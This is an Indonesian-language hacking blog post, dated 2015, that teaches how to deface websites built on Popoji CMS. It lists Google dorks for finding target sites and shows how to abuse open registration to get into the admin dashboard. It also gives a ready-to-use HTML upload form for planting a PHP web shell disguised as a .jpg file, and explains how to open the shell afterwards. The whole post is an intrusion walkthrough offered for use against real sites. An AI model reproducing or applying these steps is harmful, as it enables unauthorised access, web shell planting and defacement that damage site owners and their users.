Expose

A Timeline Design For Your Blog

Sesuai Janji Saya, kali ini saya akan membeberkan cara mengupload shell di Cms Popoji.
Tanpa banyak basa-basi, lanjut Tutorial :
Sesudah anda Log-in ke website target agar dapat masuk ke dashboard admin website, silahkan masuk untuk yang belum Tahu CARA DEFACE WEBSITE MENGGUNAKAN CMS POPOJI


Jika sudah masuk, masukan URL bug/vuln dengan : 
target.co.id/po-admin/js/plugins/uploader/upload.php

Jika terdapat text :
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
Itu tandanya Web target Vuln.

CSRF Code:

<form method="post" action="target.co.id/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>
(Masukan Script diatas ke Notepad lalu Save As : "CSRF.html")
kemudian buka CSRF.html nya dengan Search Engine anda

Upload Shell anda dengan ekstensi ".Jpg"

Lalu akses URL : "target.co.id/po-content/po-upload/"
Jika tampilan "Forbidden" maka itu diluar kemampuan saya hehe
Sesudah anda upload Shellnya maka besar kemungkinan tampilan nya seperti :

Lalu pilih Shell anda yang ada di list seperti diatas.
Maka tampilan Menjadi seperti ini :

Selesai. Semoga bermanfaat guys :)
Tunggu Cara Instal Cms Popojinya yaa...
Oke Selamat datang di blog baru saya. Untuk postingan pertama, saya akan memberikan tips Deface Website Menggunakan Cms Popoji
Cms Popoji adalah CMS yang dibuat Oleh para programer Indonesia (karya anak Bangsa).
Bug ini terletak Pada Halaman Login pada CMS Popoji. Secara default memang cms ini Menyediakan Layanan Registrasi akun dan tidak memfilternya. Seperti Com_User di joomla & WP add Admin di Wordpress.
Jadi karna ini CMS buatan Indonesia, dan dapat dipastikan Website yg menggunakan Cms ini Berasal dari Indonesia juga.
Next... Tutorial :
"Dork" (Pakai Search Engine) :
inurl:"/detailpost site:.or.id"
Inurl:"/detailpost site:.co.id"
Powered by Popoji
© popojicms
(ganti domainnya dorknya sesuai kebutuhan) 
Xploit :

target.co.id/[path]/po-admin/

Setelah dapat targetnya, masuk ke admin page log-in.
target.co.id/po-admin/
Kemudian anda akan disuguhkan tampilan berikut:

Kemudian klik "create one for free !"
Lalu masuk ke form registrater


Masukan data diri sesuai email anda, kemudian klik "Register Account"
Pastikan tampilan menjadi seperti ini :

Cek email yang anda registrasikan tadi, biasanya muncul di "Inbox/Spam"



Lalu klik link yg berwarna Biru.
Anda akan masuk ke halaman log-in admin seperti berikut :


Isi kembali berdasarkan form yang anda masukan tadi, lalu klik "Login to Dashboard"
Dan anda akan masuk ke halaman Dashboar Website Target :


Selesai. Semoga Bermanfaat Guys :)
© Copyright 2015 BayuBeatOnly - All Rights Reserved Created by Themexpose
Back to Top